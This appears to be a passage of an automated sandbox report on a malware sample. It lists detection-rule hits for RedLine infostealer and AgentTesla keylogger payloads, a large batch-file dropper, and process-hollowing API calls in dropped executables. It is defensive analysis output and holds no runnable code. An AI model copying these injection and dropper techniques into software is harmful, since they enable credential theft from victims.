                  Source: 11.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 17.1.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000011.00000002.2918780561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0000000B.00000002.2004085524.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000011.00000001.1996288631.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Found large BAT file
                  Source: z1Transaction_ID_REF2418_cmd.batStatic file information: 1139107
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D8670 NtUnmapViewOfSection,3_2_031D8670
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D8400 NtReadVirtualMemory,3_2_031D8400
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D7A2C NtAllocateVirtualMemory,3_2_031D7A2C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D7D78 NtWriteVirtualMemory,3_2_031D7D78
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,3_2_031D8D70
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,3_2_031DDD70
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,3_2_031DDC04
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,3_2_031DDC8C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,3_2_031DDBB0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D7A2A NtAllocateVirtualMemory,3_2_031D7A2A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,3_2_031D8D6E
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B8670 NtUnmapViewOfSection,10_2_031B8670
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B8400 NtReadVirtualMemory,10_2_031B8400
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B7A2C NtAllocateVirtualMemory,10_2_031B7A2C
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B7D78 NtWriteVirtualMemory,10_2_031B7D78
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,10_2_031B8D70
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031BDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,10_2_031BDD70
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B86F7 NtUnmapViewOfSection,10_2_031B86F7
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031BDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_031BDBB0
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B7A2A NtAllocateVirtualMemory,10_2_031B7A2A
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B7AC9 NtAllocateVirtualMemory,10_2_031B7AC9
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,10_2_031B8D6E
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031BDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_031BDC04
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031BDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,10_2_031BDC8C
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A8670 NtUnmapViewOfSection,16_2_031A8670
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A8400 NtReadVirtualMemory,16_2_031A8400
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A7A2C NtAllocateVirtualMemory,16_2_031A7A2C
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A7D78 NtWriteVirtualMemory,16_2_031A7D78
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,16_2_031A8D70
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031ADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,16_2_031ADD70
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A86F7 NtUnmapViewOfSection,16_2_031A86F7
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031ADBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,16_2_031ADBB0
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A7A2A NtAllocateVirtualMemory,16_2_031A7A2A
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A7AC9 NtAllocateVirtualMemory,16_2_031A7AC9
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,16_2_031A8D6E
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031ADC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,16_2_031ADC04
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031ADC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,16_2_031ADC8C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D8788 CreateProcessAsUserW,3_2_031D8788
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031C20C43_2_031C20C4
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00408C609_2_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_0040DC119_2_0040DC11
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00407C3F9_2_00407C3F
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00418CCC9_2_00418CCC
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00406CA09_2_00406CA0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004028B09_2_004028B0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_0041A4BE9_2_0041A4BE
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00408C609_2_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004182449_2_00418244
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004016509_2_00401650
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00402F209_2_00402F20
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004193C49_2_004193C4
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004187889_2_00418788
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00402F899_2_00402F89
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00402B909_2_00402B90
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004073A09_2_004073A0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_27F6DA509_2_27F6DA50
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_27F6CE389_2_27F6CE38
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_27F60FD09_2_27F60FD0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_27F6D1809_2_27F6D180
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_27F610309_2_27F61030
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D1867489_2_2D186748
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D18CFC89_2_2D18CFC8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D1899C09_2_2D1899C0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D1800409_2_2D180040
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D18F2789_2_2D18F278
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D18F9D29_2_2D18F9D2
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D1800079_2_2D180007
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D18C0E89_2_2D18C0E8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D8157B79_2_2D8157B7
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D8109D09_2_2D8109D0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D81A8A29_2_2D81A8A2
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D81DE389_2_2D81DE38
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D811AC89_2_2D811AC8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2DB81C609_2_2DB81C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2DB8E7209_2_2DB8E720
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2DB81C579_2_2DB81C57
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2DEC45719_2_2DEC4571
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00408C609_1_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_0040DC119_1_0040DC11
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00407C3F9_1_00407C3F
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00418CCC9_1_00418CCC
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00406CA09_1_00406CA0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004028B09_1_004028B0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_0041A4BE9_1_0041A4BE
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00408C609_1_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004182449_1_00418244
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004016509_1_00401650
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00402F209_1_00402F20
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004193C49_1_004193C4
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004187889_1_00418788
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00402F899_1_00402F89
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00402B909_1_00402B90
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004073A09_1_004073A0
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031A20C410_2_031A20C4
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031AC98E10_2_031AC98E
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031AC9DE10_2_031AC9DE
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00408C6011_2_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_0040DC1111_2_0040DC11
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00407C3F11_2_00407C3F
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00418CCC11_2_00418CCC
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00406CA011_2_00406CA0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_004028B011_2_004028B0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_0041A4BE11_2_0041A4BE
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00408C6011_2_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_0041824411_2_00418244
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_0040165011_2_00401650
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00402F2011_2_00402F20
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_004193C411_2_004193C4
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_0041878811_2_00418788
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00402F8911_2_00402F89
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00402B9011_2_00402B90
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_004073A011_2_004073A0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_24F1DCE811_2_24F1DCE8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_24F1D0D011_2_24F1D0D0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_24F1103011_2_24F11030
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_24F1D41811_2_24F1D418
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_24F10FD011_2_24F10FD0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2A49004011_2_2A490040
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2A4999A011_2_2A4999A0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2A49672811_2_2A496728
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2A49CFA811_2_2A49CFA8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2A49002F11_2_2A49002F
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AB1A8CF11_2_2AB1A8CF
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AB107C011_2_2AB107C0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AB155A711_2_2AB155A7
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AB118B811_2_2AB118B8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AB1DD8811_2_2AB1DD88
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AFE0C3011_2_2AFE0C30
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AFEE86011_2_2AFEE860
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00408C6011_1_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_0040DC1111_1_0040DC11
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00407C3F11_1_00407C3F
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00418CCC11_1_00418CCC
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00406CA011_1_00406CA0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_004028B011_1_004028B0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_0041A4BE11_1_0041A4BE
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00408C6011_1_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_0041824411_1_00418244
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_0040165011_1_00401650
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00402F2011_1_00402F20
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_004193C411_1_004193C4
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_0041878811_1_00418788
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00402F8911_1_00402F89
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00402B9011_1_00402B90
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_004073A011_1_004073A0
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 13_2_004057B813_2_004057B8
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031920C416_2_031920C4
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_0319C98F16_2_0319C98F
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_0319C9DF16_2_0319C9DF
                  Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\xrbjyllC.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: String function: 0040A6C4 appears 68 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 031C46D4 appears 244 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 031D89D0 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 031D894C appears 56 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 031C4500 appears 33 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 031C4860 appears 949 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 031C44DC appears 74 times
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: String function: 031A894C appears 50 times
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: String function: 031946D4 appears 155 times
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: String function: 03194860 appears 683 times
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: String function: 031A46D4 appears 155 times
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: String function: 031A4860 appears 683 times
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: String function: 031B894C appears 50 times
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: String function: 0040D606 appears 96 times
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: String function: 0040E1D8 appears 172 times
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: String function: 0040FB9C appears 40 times
